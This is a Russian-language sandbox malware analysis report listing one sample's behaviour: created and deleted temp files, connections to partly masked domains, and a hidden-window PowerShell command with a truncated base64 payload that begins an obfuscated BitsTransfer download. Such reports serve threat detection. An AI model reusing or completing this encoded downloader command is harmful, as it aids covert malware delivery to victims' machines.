Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e LgAoACcASQBtAHAAJwArACcAbwAnACsAJwByAHQALQAnACsAJwBNACcAKwAnAG8AZAB1AGwAZQAnACkAIABCAEkAdABzAFQAUgBBAG4AcwBGAGUAUgA7ACQAZwBhAGkAdgB5AG8AZwBnAGkAZQBrAGQAbwBqAHgAYQB1AG0AbABvAGEAbQA9ACcAaAB0AH...
Изменения в файловой системе
Создает следующие файлы
- %WINDIR%\temp\cabd70.tmp
- %WINDIR%\temp\tard71.tmp
- %WINDIR%\temp\cabda1.tmp
- %WINDIR%\temp\tarda2.tmp
- %WINDIR%\temp\cab2409.tmp
- %WINDIR%\temp\tar240a.tmp
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\temp\cab5434.tmp
- %WINDIR%\temp\tar5435.tmp
- %WINDIR%\temp\cab69b2.tmp
- %WINDIR%\temp\tar69b3.tmp
Удаляет следующие файлы
- %WINDIR%\temp\cabd70.tmp
- %WINDIR%\temp\tard71.tmp
- %WINDIR%\temp\cabda1.tmp
- %WINDIR%\temp\tarda2.tmp
- %WINDIR%\temp\cab2409.tmp
- %WINDIR%\temp\tar240a.tmp
- %WINDIR%\temp\cab5434.tmp
- %WINDIR%\temp\tar5435.tmp
- %WINDIR%\temp\cab69b2.tmp
- %WINDIR%\temp\tar69b3.tmp
Сетевая активность
Подключается к
- 'sh####nfoways.com':80
- 'te###.cxyw.net':80
- 'su########eandorganicgarments.com':80
TCP
- 'ra####kaonline.com':443
UDP
- DNS ASK ra####kaonline.com
- DNS ASK sh####nfoways.com
- DNS ASK te###.cxyw.net
- DNS ASK su########eandorganicgarments.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e LgAoACcASQBtAHAAJwArACcAbwAnACsAJwByAHQALQAnACsAJwBNACcAKwAnAG8AZAB1AGwAZQAnACkAIABCAEkAdABzAFQAUgBBAG4AcwBGAGUAUgA7ACQAZwBhAGkAdgB5AG8AZwBnAGkAZQBrAGQAbwBqAHgAYQB1AG0AbABvAGEAbQA9ACcAaAB0AH...' (со скрытым окном)
